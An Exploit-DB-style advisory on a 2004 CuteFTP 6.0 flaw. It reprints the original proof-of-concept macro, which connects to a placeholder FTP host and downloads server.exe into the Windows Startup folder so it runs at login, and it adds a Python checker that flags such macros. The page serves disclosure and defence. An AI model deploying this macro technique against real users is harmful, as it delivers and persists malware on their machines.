Vendor: CuteFTP
By: atmaca@prohack.net
CVSS: 5.5 (MEDIUM)
Vulnerability type: Arbitrary File Download
CWE: 22
Product Name: CuteFTP
Affected Version From: GlobalSCAPE CuteFTP V6.0
Affected Version To: GlobalSCAPE CuteFTP V6.0
Patch Exists: NO
CPE: a:globalscape:cuteftp:6.0
Year: 2004

Arbitrary File Download in GlobalSCAPE CuteFTP V6.0

An attacker can craft a CuteFTP macro (*.mcr) that, when loaded on the target computer, downloads an arbitrary file into the target user's startup folder.

Mitigation:

Update to a patched version of GlobalSCAPE CuteFTP V6.0 or later. Do not open or execute macros from untrusted sources.
Source

Exploit-DB raw data:

Application:  GlobalSCAPE CuteFTP V6.0
             http://www.globalscape.com/

Risk:         Medium

/*
e-mail: atmaca@prohack.net
web: http://www.prohack.net
*/

--The bug:

An attacker can create a crafted CuteFTP macro (*.mcr),
and when it's loaded on the target computer, it can download an arbitrary file
into the target user's startup folder.

----example *.mcr macro----

Host FTP_HOST_HERE
Login Normal
User FTP_USER_HERE
Pass FTP_PASS_HERE
Connect
RemoteSelect server.exe
Download
LocalCwd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\


# milw0rm.com [2004-09-28]
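
A pre-load check that supports the mitigation above, as an added example that is not part of the original advisory or of CuteFTP: it parses a macro in the line-oriented form shown in the sample and reports steps that save into a Startup folder, select an executable file type, or embed credentials. The keyword names come only from the sample on this page; `parse_macro`, `vet_macro` and the extension list are hypothetical, and the real macro grammar may allow forms this does not handle.

```python
import re

# Assumption: a macro is line-oriented "Keyword argument" text, as in the
# sample on this page; keyword names below are taken from that sample only.
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\*$", re.IGNORECASE)
EXECUTABLE_EXT = (".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".vbs", ".lnk")

# Constructed input: the page's sample macro with its placeholders left as-is.
SAMPLE = r"""Host FTP_HOST_HERE
Login Normal
User FTP_USER_HERE
Pass FTP_PASS_HERE
Connect
RemoteSelect server.exe
Download
LocalCwd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\
"""


def parse_macro(text):
    """Yield (line_no, keyword, argument) for each non-empty macro line."""
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if line:
            keyword, _, argument = line.partition(" ")
            yield line_no, keyword.lower(), argument.strip().strip('"')


def vet_macro(text):
    """Return [(line_no, finding)] for steps a reviewer should see before loading."""
    findings = []
    for line_no, keyword, argument in parse_macro(text):
        if keyword == "localcwd":
            # Accept either slash style; match the folder at the end of the path.
            if STARTUP_DIR.search(argument.replace("/", "\\")):
                findings.append((line_no, "local directory is a Startup folder"))
        elif keyword == "remoteselect":
            if argument.lower().endswith(EXECUTABLE_EXT):
                findings.append((line_no, "selects an executable file type"))
        elif keyword == "pass" and argument:
            findings.append((line_no, "embeds FTP credentials"))
    return findings


if __name__ == "__main__":
    for line_no, finding in vet_macro(SAMPLE):
        print(f"line {line_no}: {finding}")
```

Localized Startup folder names are not matched by the pattern, so an empty result means only that none of these three checks fired.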